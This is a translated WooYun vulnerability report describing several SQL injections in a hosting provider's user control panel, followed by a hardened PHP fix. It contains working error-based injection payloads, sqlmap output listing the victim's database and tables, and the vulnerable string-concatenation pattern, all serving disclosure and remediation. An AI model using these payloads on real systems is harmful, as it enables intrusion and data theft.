WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ----------------------- http://drop.zone.ci/
2015-09-23: Details reported to the vendor; awaiting vendor handling
2015-09-25: CNCERT (National Internet Emergency Center) was for the time being unable to reach the affected organization; details disclosed only to the coordinating body
2015-10-05: Details disclosed to core white hats and domain experts
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public
Multiple SQL injections after logging into the user control panel! Allows entering the admin backend and adding account funds, and leaks important information that allows logging into mailboxes, etc.
First, log into the user control panel with several of the user accounts obtained in the previous test.
After logging in, several SQL injection points can be found:

1. Injection point one:
http://**.**.**.**/user/domain_list.php?iStatus=2 (GET)
The iStatus parameter is injectable.
Requesting http://**.**.**.**/user/domain_list.php?iStatus=2' returns the error:

MySQL server error report:
Array
(
    [0] => Array ( [message] => MySQL Query Error )
    [1] => Array ( [sql] => select count(*) from domain where 1 AND UserName='*******' AND iStatus='2'' )
    [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1 )
    [3] => Array ( [errno] => 1064 )
)
sqlmap test:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: iStatus
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: iStatus=2' AND (SELECT 4685 FROM(SELECT COUNT(*),CONCAT(0x71786a6871,(SELECT (CASE WHEN (4685=4685) THEN 1 ELSE 0 END)),0x7166757471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KvQP'='KvQP
---
[10:14:47] [INFO] testing MySQL
[10:14:48] [INFO] heuristics detected web page charset 'ascii'
[10:14:48] [WARNING] reflective value(s) found and filtering out
[10:14:48] [INFO] confirming MySQL
[10:14:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[10:14:48] [INFO] fetching current user
[10:14:48] [INFO] resumed: gz3721@%
current user: 'gz3721@%'
[10:14:48] [INFO] fetching current database
[10:14:48] [INFO] resumed: gz3721
current database: 'gz3721'
[10:14:48] [INFO] testing if current user is DBA
[10:14:48] [INFO] fetching current user
current user is DBA: False
database management system users [1]:
[*] 'gz3721'@'%'
available databases [2]:
[*] gz3721
[*] information_schema
Database: gz3721
[27 tables]
+--------------+
| 400          |
| database     |
| domain       |
| order        |
| admins       |
| config       |
| dcontact     |
| doc          |
| email        |
| financial    |
| getpwd       |
| host         |
| mohost       |
| news         |
| nicebox      |
| nicecall     |
| onlinepay    |
| payment_type |
| products     |
| qq           |
| question     |
| secu_class   |
| security     |
| server       |
| server_old   |
| sms          |
| users        |
+--------------+
Database: gz3721
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| doc          | 247     |
| products     | 227     |
| security     | 48      |
| question     | 46      |
| config       | 33      |
| financial    | 23      |
| users        | 18      |
| secu_class   | 14      |
| `order`      | 13      |
| onlinepay    | 12      |
| news         | 11      |
| getpwd       | 7       |
| `domain`     | 6       |
| dcontact     | 6       |
| payment_type | 5       |
| host         | 3       |
| admins       | 2       |
| email        | 2       |
| qq           | 1       |
| server       | 1       |
+--------------+---------+
The information obtained allows entering the admin backend, and the sensitive information can be used to log into the mailboxes.

2. Injection point two:

http://**.**.**.**/user/domain_list.php (POST) keyword=111
http://**.**.**.**/user/host_list.php (POST) keyword=222
http://**.**.**.**/user/mohost_list.php (POST) keyword=333
http://**.**.**.**/user/email_list.php (POST) keyword=444
……
http://**.**.**.**/user/host_list.php (POST) keyword=999
http://**.**.**.**/user/order_list.php (POST) keyword=1234
http://**.**.**.**/user/fin_list.php (POST) keyword=2345
http://**.**.**.**/user/infolist.php (POST) keyword=12345

and so on; in all of them the keyword parameter is injectable.
POST parameter 'keyword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
---
Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: keyword=111') AND (SELECT 7427 FROM(SELECT COUNT(*),CONCAT(0x7169646471,(SELECT (CASE WHEN (7427=7427) THEN 1 ELSE 0 END)),0x7164796f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Rdzk'='Rdzk
---
[18:17:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[18:17:41] [INFO] fetching current user
[18:17:41] [INFO] retrieved: gz3721@%
current user: 'gz3721@%'
[18:17:41] [INFO] fetching current database
[18:17:41] [INFO] retrieved: gz3721
current database: 'gz3721'
[18:17:41] [INFO] testing if current user is DBA
[18:17:41] [INFO] fetching current user
current user is DBA: False
database management system users [1]:
[*] 'gz3721'@'%'
available databases [2]:
[*] gz3721
[*] information_schema
Fix: filter the input.
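The leaked error on injection point one shows the query shape (`... AND UserName='...' AND iStatus='2''`), which points to the parameter being concatenated straight into the SQL string. As an added example that is not the vendor's code, the reconstructed vulnerable pattern is shown next to a hardened version using PDO prepared statements and strict validation; the table and column names domain, UserName and iStatus come from the leaked error, while DomainName, the DSN and the shape of the keyword query are assumptions.

```php
<?php
// Added example, not the vendor's code. Table/column names "domain", "UserName"
// and "iStatus" come from the leaked error; "DomainName", the DSN and the
// keyword query shape are assumptions made for illustration.

// Vulnerable pattern, reconstructed from the leaked query (for contrast only):
//   $sql = "select count(*) from domain where 1 AND UserName='$user'"
//        . " AND iStatus='" . $_GET['iStatus'] . "'";
//   mysql_query($sql) or die(print_r($errorArray));   // also echoes the SQL

function connectDb($dsn, $dbUser, $dbPass)
{
    $pdo = new PDO($dsn, $dbUser, $dbPass);
    // Real server-side prepared statements, and exceptions instead of the
    // error dump the site currently returns to the browser. Callers catch
    // PDOException, log it server-side and show a generic error page.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

function countDomains(PDO $pdo, $user, $statusInput)
{
    // iStatus is a status code: reject anything that is not an integer
    // rather than trying to strip quotes out of it.
    $status = filter_var($statusInput, FILTER_VALIDATE_INT);
    if ($status === false) {
        throw new InvalidArgumentException('iStatus must be an integer');
    }
    $stmt = $pdo->prepare(
        'SELECT COUNT(*) FROM domain WHERE UserName = :user AND iStatus = :status'
    );
    // Bound values never become part of the SQL grammar.
    $stmt->execute(array(':user' => $user, ':status' => $status));
    return (int) $stmt->fetchColumn();
}

function searchDomains(PDO $pdo, $user, $keyword)
{
    // Binding stops injection; escaping % and _ additionally stops a search
    // term from being turned into a match-everything wildcard.
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt = $pdo->prepare(
        'SELECT DomainName FROM domain WHERE UserName = :user AND DomainName LIKE :kw'
    );
    $stmt->execute(array(':user' => $user, ':kw' => $pattern));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}
```

The same pattern applies to every `*_list.php` endpoint listed above, since they all take the same `keyword` parameter.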
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-09-25 17:15
CNVD confirmed and reproduced the described situation, and has notified the website operator by email through its publicly listed contact channel; the operator will provide a fix.
None yet